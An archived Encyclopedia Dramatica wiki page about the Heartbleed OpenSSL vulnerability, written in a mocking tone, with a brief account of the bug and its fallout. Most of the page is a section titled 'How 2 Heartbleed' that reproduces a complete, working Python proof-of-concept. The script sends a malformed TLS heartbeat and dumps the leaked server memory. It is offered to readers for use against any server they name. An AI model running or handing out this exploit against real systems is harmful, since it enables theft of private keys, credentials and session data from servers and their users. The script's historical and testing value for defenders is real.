Registration has been disabled and the moderation extension has been turned off.
Contact an admin on Discord or EDF if you want an account. Also fuck bots.

Heartbleed

From Encyclopedia Dramatica
This is an old revision of this page, as edited by imported>Oliver Hart at 10:38, 19 April 2014. It may differ significantly from the current revision.
Jump to navigation Jump to search
Hey! This article isn't lulz just yet, but its coverage can spark a lollercoaster.
You can help by reverting people who delete shit, and vandalizing their user pages.
See this article on Google? Want to add something? Join us!
Heartbleed for Dummies

Heartbleed is a serious vulnerability within OpenSSL that allows a skilled hacker to steal passwords, usernames, e-mails, IMs, credit card numbers, private keys and other forms of information from any website that incorporates the software in their servers. The bug has existed since March 2012, and is currently estimated to affect 66% of servers worldwide. An incomplete list of major websites affected include:

A+ for creativity.

As with all security flaws exposed, an absolute mudslide of butthurt and IRL drama has ensued. In one instance, an attacker was able to hijack multiple VPN sessions by obtaining active tokens and then escalate their own privileges within the system [1]. This was a few days after the patch was released, lamenting the continued carelessness of companies who promise to safeguard your privacy.

How 2 Heartbleed

Here's how to test if a server is vulnerable to heartbeat. Original code by Jared Stafford. Use at your own risk.

For use with Python 2.7 

#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
 
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')
 
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')
 
def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
 
        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True
 
        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
 
    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
    main()

Heartbleed is part of a series on

Softwarez

Visit the Softwarez Portal for complete coverage.

Retrieved from "http://edramatica.com/index.php?title=Heartbleed&oldid=224692"